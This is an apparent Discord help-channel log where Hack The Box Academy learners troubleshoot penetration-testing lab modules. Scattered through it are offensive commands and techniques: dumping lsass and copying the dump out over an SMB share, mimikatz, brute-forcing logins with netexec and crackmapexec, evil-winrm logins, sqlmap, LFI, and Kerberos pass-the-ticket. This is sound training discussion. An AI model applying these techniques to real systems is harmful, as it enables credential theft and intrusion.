fathom pendant
#

I generally use the tcp vpn download file

#

Instead of udp

safe star
topaz cliff
# sacred jacinth yes

But I still have a qube-based account with 50 qubes that I took when I created the account Today, I paid $8. Does it take time to unlock modules?

sacred jacinth
#

it won't ask for cubes

sly trench
safe star
#

that windows machine has ssh on it?

#

cant you just use impacket-smbserver

topaz cliff
sacred jacinth
topaz cliff
sacred jacinth
wild sage
sly trench
# safe star that windows machine has ssh on it?

Idk dude, it seems like this machine wants to make me angry. i dumped the lsass through the given command, did "dir c:\lsass.dmp" and i could see the file. Now I resetted the machine and vpn, did the same command with the same id and now I can't see the file.
Two hours ago I used scp to transfer the lsass.dmp and it didn't say time out , I couldn't find the file on my kali VM but it didn't say time out. Now it does

safe star
#

the machine doesnt have ssh tho

acoustic owl
red juniper
safe star
#

i just did it with impacket-smbserver and used "move lsass.dmp \ip\share"

topaz cliff
safe star
#

you also dont need verbose level to 5 here

wild sage
#

verbose to 2 or 3?

safe star
#

i used "-p 'id' --randomized=(paramter) --batch"

#

thats it

wild sage
#

okay ill try that

#

got the flag, had to add --dump to the your command

sly trench
safe star
#

what did you dump it with?

#

im pretty sure its in the htb-student/appdata/local/temp if you used task manager

fathom pendant
#

You can definitely bruteforce Johanna

#

Try the resources wordlist and mutated

sly trench
#

This command was done users\htb-student\desktop because I thought to save the output in the same directory

#

But it's not there, also I tried -o lsass.dmp at the end but also can't find it

shut vapor
#

...

safe star
#

bro

sly trench
#

It's not in c:\

#

I looked there

#

Yes it's not there I checked again

safe star
#

make your own dir then put it there

fathom pendant
#

No

#

Mutated should work, you can use more threads on some services

sly trench
fathom pendant
#

Try and see

#

Plenty of services to potentially attack as well

#

Nxc can attack some as well

sly trench
wide river
fathom pendant
vocal pulsar
fathom pendant
#

Netexec, it's like crackmapexec, but better

vocal pulsar
fathom pendant
#

Or other services like winrm

tender nimbus
#

Hey guys little question, on the screen the as sysdba is it like using a command with sudo?

#

or is it like connecting with the admin acc to scot's acc?

olive ingot
#

Hey! Something which I cannot explain is happening in BURP. Working through https://academy.hackthebox.com/module/136/section/1290 and fuzzing the file upload request. The first time I send a request to repeater and execute it - I get a "File successfully uploaded" response, same as in the captured response in the Proxy tab. From the second request and on, the Content-Length header gets updated from 912 to 1133 and the response I get is "Only images are allowed". Note that I am not changing one bit from the initial successful payload. I disabled the "Update Content-Length" but that fails as the server returns 400 Bad Request. It really seems like BURP is adding something to my payload. It gets even weirder - if I am switched to the "HEX" view in Repeater I can send the request multiple times, the payload is not modified and I am getting the expected response "File successfully uploaded". I am using latest version of Burp - v2024.7.5

safe star
fathom pendant
#

Meaning you're logging in as the highest administrative account on the database

tender nimbus
fathom pendant
#

as is like impersonation (if the user has the relevant role to)

tender nimbus
fathom pendant
tender nimbus
#

Ow okej

#

thank you

fathom pendant
#

You can't do it for all users

#

Just the ones that can

tender nimbus
fathom pendant
#

Odat is the only tool I know of so far

#

Run the install script line by line instead of as a script

#

It's really dumb

#

And skips over certain things

tender nimbus
#

okej gonna try

vocal holly
#

so, in the server-sides attack module (skills assessment part), i just did a LFI to get /flag.txt and it worked. I don't know if the lab is really this easy or were i supposed to do some different steps to get the flag :/

placid edge
#

anyone here done HTTP Response splitting?

#

module?

#

stuck on it for hours now

analog dock
#

Great question

old oasis
placid edge
#

lol, just dont want to start typing out what i've done here, because it contains spoilers

#

hard to not spoil it, when its different stuff binded

old oasis
#

sure but you can do that without spoilers like for example what part of the module you are on etc.

placid edge
#

and thats why i asked if anyone done it, so i could then ask if i could dm them

#

i said that

#

HTTP Response Splitting

#

in the module HTTP Attacks

fathom pendant
#

It wasn't clear that was the module you were working on

zealous rune
#

I'm trying to figure out the debian codename that underpins my parrot install. This is so i can specify the right apt repo for docker installation

#

so i can then install bloodhound CE šŸ™‚

fathom pendant
#

Natural reading assumes "HTTP response splitting" is the module name

zealous rune
#

ah thank u

fathom pendant
#

It's based on latest deb stable == bullseye

zealous rune
#

in the usual places /etc/os-release i could only see the parrot code name lory

umbral path
#

Hey why cant I type inside of the general chat also does anyone want to work together as study buddies with my friend and I

placid edge
fathom pendant
dim wolf
umbral path
#

Thanks guys

#

Very helpful

zealous rune
#

thx.... sometimes in other debian based distros you can find the debian codename tho

sly trench
#

Why is it that every few weeks I need to delete my Kali Linux VM and download a new one otherwise it works weird? Many programs aren't working properly idk what's going on but when it's freshly installed i usually don't have this issue

#

Like pypykatz, it's been running for like 1 hour and still hasn't outputted anything

fathom pendant
#

sounds like something is up with your install method then if it's failing every few weeks

#

or your assigned resources

#

ĀÆ_(惄)_/ĀÆ

fathom pendant
#

i.e. something is up with your virtualization software

#

OR the assigned resources can't be handled properly by the host

#

or somehow in some way it's just not doing what it needs to

sly trench
sly trench
fathom pendant
#

ĀÆ_(惄)_/ĀÆ

#

sounds like some weird creeping issue that takes around 2 weeks to show

#

but i don't have experience with VMware

#

i use virtualbox personally, that's because at the time it was the free alternative to VMware (still won't migrate to VMWare because Broadcom and PII)

sly trench
#

Anyone else have this problem with VMware 7?

clear rover
#

Hey guys, im doing the last lab for FIle Uploads module, i can upload a shell but how do i find the uploads directory? The hint says look at the source code and naming conventions but im having trouble finding it?

fathom pendant
worn matrix
#

Can a mod or staff answer this?

#

can i ask something?

subtle oriole
fathom pendant
worn matrix
#

it has happened to me 2 times

fathom pendant
#

you mean on main labs?

worn matrix
#

on machines yes

fathom pendant
compact patrolBOT
fathom pendant
#

if you want to reach out to support to ask them ^

worn matrix
#

ok thanks a lot

clear rover
subtle oriole
#

About to hit first module practice lab, this bloody CPTS is so addictive and I haven’t actually started to hack just yet!

fathom pendant
#

see: limited file uploads potentially for something you can do

clear rover
#

yeah im thinking xxe injection but how would i get the source code of the file; im just curious how the backend is working here

fathom pendant
#

this is ofc after fuzzing for viable extensions and image/ types

fathom pendant
#

think back to what you had to do for the 2nd question of that section; and try and figure out from there what you need to do

#

there's nothing on the skill assessment that wasn't covered by the module

muted patio
#

I am in the containerization module and cannot get any container to run. The containers show up on the lxc list but can't get them to budge. I get a ../src/lxc/tools/lxc_start.c: main: 266 No container config specified. I have looked for hours through Google but I have not found anything that works. If someone could point me in the right direction I would appreciate it. I am running Ubuntu 24.04 LTS and have LXD and LXC utils installed. Docker works fine but not Linux containers.

clear rover
#

love that answers not the given so easily here

fathom pendant
fathom pendant
muted patio
#

Sorry Linux Fundamentals

fathom pendant
#

also the Module Name is Linux Fundamentals it's not a path

#

Academy is broken down as follows:
Paths - A collection of Modules
Module - A learning material that covers a specific topic or small range of topics
Section - A specific chapter/page in a module that generally teaches a specific thing about the module topic

muted patio
#

Thank you for the clarification, I'll just move on then. Thanks for the quick reply

fathom pendant
#

the 2 major things that will help others help you is the Module Name and Section Name; alongside what you've tried

#

also with that error, it's looking for a specific configuration to run and virtualize

muted patio
#

I will be sure to ask better questions next time. Thank you again for explaining the paths, modules and sections as well as the link.

fathom pendant
median gale
#

Using mimikatz you can find the password of a user

fathom pendant
#

you can use mimikatz or other techniques to dump info

fleet fractal
#

what modules go over must know stuff for pen testing

fathom pendant
#

well a lot is covered in the Penetration Tester Job Role Path

#

at least the bare minimum to consider when doing it; your methodology for moving forward is to be developed as you learn more

old oasis
#

I am stuck on Injection Attacks Skill Assessment. I am in the last part but need a little nudge to get the flag.

fathom pendant
dim wolf
#

Injection Attacks module

#

from CWEE

fathom pendant
#

ah

#

mb

#

silly me

old oasis
#

no worries šŸ˜„

unique ether
#

Vulnerability assessment module is so boring

#

šŸ’€

trim frost
#

(skip it)

#

just kidding

fathom pendant
#

generally those vuln scan tools are good if you really just need a "random bullshit go" option to find vulns

unique ether
fathom pendant
#

the scans are preloaded onto the targets

#

at their respective https://IP:<port> replacing <port> with the relative tool port

manic bramble
#

I'm having trouble with loading a target for module : Attacking Common Apps - Gitlab

fathom pendant
#

By loading target do you mean it's not spawning?

#

If so: change vpn regions and try spawning a new target

manic bramble
#

yes, it's just spinning

#

okay

fathom pendant
#

You'll need to download a new vpn to use

manic bramble
#

that worked! thanks alot

quasi wave
#

hi on the network services section of password attacks module I am trying to use evil-winrm and crackmapexec with winrm protocol specification to crack passwords. I have a login creds file on the pwnbox's desktop. crackmapexec with that username and password specified in that file doesn't work. I think the target is vulnerable to WinRM because I tested it. Is the my_credentials.txt file not the right file?

#
└──╼ [ā˜…]$ crackmapexec winrm  10.129.139.246 -u htb-ac-605555  -p 5JLHdfBK
WINRM       10.129.139.246  5985   WINSRV           [*] Windows 10 / Server 2019 Build 17763 (name:WINSRV) (domain:WINSRV)
WINRM       10.129.139.246  5985   WINSRV           [-] WINSRV\htb-ac-605555:5JLHdfBK
#
└──╼ [ā˜…]$ sudo evil-winrm -i 10.129.139.246 -u htb-ac-605555 -p 5JLHdfBK
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
                                        
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
                                        
Error: Exiting with code 1
#

evil winrm won't work and neither will crackmapexec

#

this is for question 1 of the network services section

#

do I use hydra?

zealous sky
#

Thank you for posting this, saved me a headache and a halfšŸ»

safe star
#

I can tell from the name, only see names like that on the pwnbox

lime dagger
#

Hey

bright seal
#

Hey this is a newbie question. I got kali in vm and when i tried to ssh from it, it keeps timing out

fathom pendant
fathom pendant
bright seal
#

nope!

#

And the firewall is off

#

Even windows command prompt timeout

quasi wave
quasi wave
#

I mean because that has to be the issue no?

fathom pendant
#

On the webpage?

quasi wave
#

oh its on the section web page thanks ok

wild sage
#

need some help with SQLmap Skill Assessment. I'm looking through the website and I'm trying to use sqlmap on the parts of the page that I think are the attack vectors. However, sqlmap is returning that nothing seems to be injectable. Just need a point in the right direction

fathom pendant
wild sage
#

yes

fathom pendant
#

Open devtools --> network tab and click on everything even on another page you can navigate to until you get the request

#

The website is nice enough to give a popup that tells you that you did a thing šŸ˜‰

wild sage
#

okay, thank you

shut vapor
#

Ffffff that pivot module assessment

#

i have mixed feelings lol it was cool, but... man what a janky connection

dusk crater
#

where i can find chat for season lab?

shut vapor
#

yea, not a fan of working through proxychains. I've got to do that again with ligolo.

fathom pendant
shut vapor
fathom pendant
#

Ligolo makes it cake

#

ĀÆ_(惄)_/ĀÆ

shut vapor
#

Great, i'll work on that before moving on then.

quasi wave
#

I am on the last question of network services section of password attacks module. I have found which user is the SMB user. The thing is I am struggling to get the right command to log into the SMB share. I look at the command in the section and I copy the exact command but replace the IP with IP of target and I found the various SMB shares but that doesn't work because one SMB share is read permission only but it won't matter because I try to access that because it gives me the same error even when I log in with the right user:

Failed to open /var/lib/samba/private/secrets.tdb
_samba_cmd_set_machine_account_s3: failed to open secrets.tdb to obtain our trust credentials for WORKGROUP
Failed to set machine account: NT_STATUS_INTERNAL_ERROR

I tried the WORKGROUP share as well even tho that's not one of the SMB shares but I tried to every SMB share that existed including the one the SMB user had read permissions for.

What am I doing wrong here? I would post my commands but I'm scared it will be marked as a spoiler.

fathom pendant
#

That's an odd error being listed

#

WORKGROUP == local windows auth

safe star
#

Remove -p

cloud urchin
#

yeah sounds like an error with the box tbh

#

but we don't know for sure without knowing what you did

quasi wave
#

but yes I am sure it confirmed the login

#

I got the green + next to the user and password

#

I will dm you the user

#

and their password

#

so you can tell me if that's the right user

#

I just dmed it to @fathom pendant

fathom pendant
#

user error; all users for this lab are unique

#

if you list the shares; you can what may be a name šŸ˜‰

#

that is your only hint for it

safe star
#

if so, remove it and let smbclient prompt you for the password

quasi wave
#

ok I got the right user I will dm marcie lee with my latest terminal output and command

#

ok I finished the section

#

it went quite well. thank you @fathom pendant for your hint

#

I'm psyched to say this is going well

fathom pendant
#

me: wondering why a page won't load... then noticing that the burp proxy was on... smhmyhead

quasi wave
#

ha ya

quiet trout
# fathom pendant me: wondering why a page won't load... then noticing that the burp proxy was on....

i complained about this on their support forum, i said that there should be a big switch or some type of color or button on the greater burp GUI to be able to turn on/off the intercept.. they told me to use the hotkey combo (doesnt really work 100% of the time if you're hoping from VM to VM or if you're just forgetful) they didnt see it as a problem. This happens to me everday, so frustrating.

Also it takes 2-3 clicks to get to/from the intercept on/off button back to/from where you were previously and it should require less effort than that... I think even ZAP has a globally accessible intercept switch if i remember correctly.

cloud urchin
#

just say what section you're on. i don't recall any of that.

safe star
quiet trout
fathom pendant
#

I'd suggest avoiding posting spoilers for the AEN module (yes even behind spoiler text as spoiler text does nothing)

mint peak
fathom pendant
#

i also did it blind, so i didn't refer to the reading or writeup for this

#

is your file saved as an executable file in the directory

mint peak
#

It's nothing that hasnt been said before in this chat

#

Search feature of discord is wonderful

fathom pendant
#

i'm aware

#

but many people do this module blind

cloud urchin
#

other people murder so it's ok for me too

fathom pendant
#

and a lot of what you said was way too spoiler rich

mint peak
#

Lmao yikes

fathom pendant
#

either way

mint peak
#

Nevermind

fathom pendant
#

make sure you have everything set properly for it to execute

cloud urchin
#

yeah i'd look into that weird character you added, the section says nothing about that so you probably didn't do it 'exactly like the module says'

fathom pendant
#

i'm going back through it again to regather some screenshots to write a report up

#

annoying af when the spawn doesn't spawn a certain Internal Host Sad_Squidward_Pepe

mint peak
#

That's so odd. I respawn the machine at least 10 times a month ago following the steps, and got the same issue every time. I've respawned 4 times tonight, and on the 4th spawn the odd character is no longer there. Same exact steps every time

#

So goofy

patent sky
#

Module: Password attacks
section: Pass the ticket from Linux
Question: Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio.
I can launch the command smbclient //dc01/C$ -k -c ls -no-pass but i don't find a way to read the julio.txt file

cloud urchin
#

so you can type and get a successful response back in the terminal?

fathom pendant
floral sinew
#

sorry to ask this n00b question but does anyone else here experience the issue of nc listening but being unable to actually connect

fathom pendant
#

Can't say I do

patent sky
cloud urchin
#

there are a lot of things wrong with that syntax

patent sky
#

May i dm you SuperNuts ?

cloud urchin
#

ok

normal sand
#

Module: Attacking Common Applications
Section: Attacking Gitlab
Link to section: https://academy.hackthebox.com/module/113/section/1217

Find another valid user on the target GitLab instance.

I managed to find quite a few usernames, including the one that is the answer to the question, however, it took a VERY long time.

Was it supposed to take that long? I used the wordlist (||/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt||). The answer was ||near the end of the list, somewhere in the 7 millions||.

celest sigil
#

anyone stuck on the getting started knowledge check?

cloud urchin
#

no

#

did you need help or something?

celest sigil
#

yeah, not finfing the contents of user.txt for some reason when i run a scan and try to gain a foothold. this is the question "Spawn the target, gain a foothold and submit the contents of the user.txt flag."

fathom pendant
#

Or I'm forgoring my modules

#

Ah

#

Because it's not in the directory you're dropped in

fathom pendant
#

Generally a user.txt is gonna be in a user's home

celest sigil
#

thank you i'll try that once my lab comes back up! it failed and closed

fathom pendant
#

www-data isn't a standard user

#

Doesn't stop you from finding one though

daring matrix
#

Hello everyone. I'm doing sqlmap course and I've frezze in the final test, could anyone please help me with my issue?

unique ether
#

hi i was just wondering how do i access nessus on the pwnbox it says service not installed but in the assessment it says its installed

fathom pendant
#

It's on the https://[targetip]:nessusport

unique ether
#

yea i got it i had restart the target machine

#

it wasnt working for some reason

fathom pendant
#

did you specify http instead of https? kek I did that

unique ether
#

oh lol

#

btw why are we launching the nessus on the target machine tho

#

cant we just mention the target IP on the pwnbox machine after nessus is installed and perform a scan like that

fathom pendant
#

As the actual scan targets are on an internal network

fathom pendant
zinc talon
#

hello

storm elk
zinc talon
#

how do i verify scarlet

#

?

fathom pendant
#

?

#

Wdym

zinc talon
#

its an app

#

that has hacks for mobile

storm elk
#

This ain’t the place for this

viscid sentinel
#

Are students still provided discounts?

storm elk
viscid sentinel
#

Cool

fathom pendant
unique ether
fathom pendant
viscid sentinel
#

The SOC analyst modules are sweet, thats all I talked about in my interview

fathom pendant
#

Lol

#

They seem pretty nifty

#

I looked through a couple

#

I do like they teach you how to manually parse a log file

#

Instead of the SIEM solution that ingests it

#

And how different types of authentication trigger different events

#

Kerberos vs NTLM gives different log events

#

And how it can be traced back to an origin ID

unique ether
#

I waited for the scan abit

#

Now I answered all the qns

#

Cause of this

#

Thanks

#

I was curious what OS the real real target was so I sshd into the target spawn to perform nmap scan against real real target. To make sure to use windows auth

#

I should have read the description better

fossil fossil
#

hello, anyone can help me with this question? It's from the Notetaking & Organization section (Documentation & Reporting module)

Steve is learning about the tool that can make logging a session easier. He messages you for help mentioning that he would like to try to split the panes vertically. What do you tell him? (Answer format: [key] + [key] + [key], i.e., fill in the values for "key" and leave the brackets and + signs.) 

I'm pretty sure about the answer, but I think I'm failing in the formatting

viscid sentinel
#

Is that tmux

fossil fossil
#

yep

#

nevermind, I just copied & pasted the text from the section and it worked...

viscid sentinel
#

Yeah but that looks like THM

#

Not HTB

fossil fossil
#

I'm pretty sure I'm in HTB academy haha

viscid sentinel
#

Nice what module

fossil fossil
#

Documentation & Reporting

crystal prawn
#

(Find out the machine hardware name and submit it as the answer.) help me pls

viscid sentinel
#

UNAME -a

#

Most of like 97 % of machines are 64bit running x86

crystal prawn
#

šŸ‘

fathom pendant
#

@viscid sentinel and @fossil fossil if you're about to tackle the Attacking Enterprise Networks module after, I highly encourage to do it blind!

fossil fossil
fathom pendant
#

as the questions are very leading

#

it's 100% doable with knowledge from the modules leading up to it

fossil fossil
#

got it, thanks!

fathom pendant
#

also suggest to treat it as a mini pentest and write up notes/report

pure apex
#

Is it okay to ask questions here?

dim wolf
#

for HTB Academy modules, yes

fathom pendant
#

only if you say the magic word Kappa

karmic girder
#

hhey guys

#

In your opinion, which tier 3 module is most valuable for pentester and which module is most valuable for redteam? thanks.

misty current
#

Cuz most of them are really good oof

silk lagoon
#

Hey guys,

Shells & Payloads Live Engagement

Second question; Exploit the target and gain a shell session. Submit the name of the folder located in C:\Shares\ (Format: all lower case)

Tried:

smb/psexec and as well smb_ms17_010

Not sure on what else I should be looking for or think of, any help would be appreciated, thank you.

fathom pendant
#

I don't recall the first host being vulnerable to that but i could be mistaken; the first host is a web app yeah?

#

did you even scan the host/target/check?

silk lagoon
#

no its not, no the first host is a windows server if im correct

fathom pendant
#

i can be windows under the hood

#

but that's not what i mean

#

lol

#

look at the engagement brief again

#

it explicitly gives a port for a reason

silk lagoon
#

8080 http

fathom pendant
#

btw

#

firefox is your friend

#

and don't forget to look at the desktop

storm elk
silk lagoon
#

on foothold machine theres none of that

#

might sound like an idiot but it said we wont be able to access if not using foothold machine

fathom pendant
#

:)

silk lagoon
pulsar berry
#

Yo dudes, I'm working on the DACL II skill assessment and I'm currently stuck on question 2. I have access to two accounts: ||angel ||and ||manuel||. Based on my enumeration, I've found that:

  • The user ||angel has permissions to create GPOs||.
  • The user ||manuel has permissions to link GPOs.||
    However, when I attempt to ||create a new GPO with angel||, I keep encountering an "Access Denied" error. My suspicion is that this is happening because|| I only have angel's NTLM hash, not their password.||

Here's what I've tried so far:

  • I used Rubeus to ||request a TGT using angel's NTLM hash||.
  • Then, I requested ||a TGS for WSMAN/SDE01||.
  • I used ||Enter-PSSession to authenticate to SDE01 using the Kerberos ticket.||
    Everything seemed to be working, but when I try to ||create a GPO, I still get the "Access Denied" error.||

What could I be missing? Should I focus on ||cracking angel's password||, or is there another way to achieve this without needing ||the password||?

hushed rivet
#

in the local file inclusion module, its not possible to find the certain file u need.

#

i checked both on pwnbox and my own instance.

#

im talking about this part "Fuzz the web application for other php scripts, and then read one of the configuration files and submit the database password as the answer"

acoustic owl
#

If your payload is correct, it should work.
Remember that you have to encode PHP scripts to be able to read them.

hushed rivet
#

has nothing to do with a payload

#

im talking about the fuzzing part.

#

i have the file name with the phpfilter it works however ffuf just doesnt find the file.

#

as explained in the description

#

it just doesnt find it at all, it finds 2 other files but not the one u need.

#

i checked the wordlist, and it does have the file u need.

acoustic owl
#

Which module, which section?

hushed rivet
#

i typed that already

#

read up

#

like if u have the filename it works, but u cant find it with ffuf which is very strange.

acoustic owl
hushed rivet
#

lol

acoustic owl
#

Which module and which section exactly do you mean?

hushed rivet
#

its called

#

file inclusion

#

i already completed the part im mentioning, but ffuf cant find the file thats all

#

so then i tryed pwnbox as verification, but same result

karmic girder
hushed rivet
#

you can dm me @acoustic owl so i can go in details

limber river
fathom pendant
fathom pendant
safe star
#

Doesn’t the lab automatically append php

fathom pendant
#

ffuf doesn't

#

:)

safe star
#

I mean like the web server will just do it for security reasons

fathom pendant
#

it depends

safe star
#

Like file.php will be file.php.php

storm elk
#

it never hurts to try

fathom pendant
#

but the context here is fuzzing

hushed rivet
fathom pendant
#

lmao even

hushed rivet
#

yea thats why it didnt found that 1

#

but it found others

fathom pendant
#

i'm currently challenging myself on how I would discover x things in the AEN module without the use of bloodhound

#

powerview is goated

#

just need to know what threads to pull

#

and i can see how you'd naturally stumble on the threads

unique ether
#

Yay done with vuln assessment

#

Tomorrow I should finish file transfer 😔

storm elk
#

good luck

safe star
fathom pendant
#

it might require some google elbow grease to really figure it out

#

whereas in bloodhound you can just click the edge and have it tell you

tacit bay
#

Is there something broken in the Lateral Movement module - Software Deployment and Remote Management Tools- wants me to authenticate as admin:RemoteManagement01 - tried VNC/RDP authentication & its failing, already reset the machine twice

safe star
#

Yeah, but powerview has its own module for a reason, so it must have something bloodhound doesn’t I’m guessing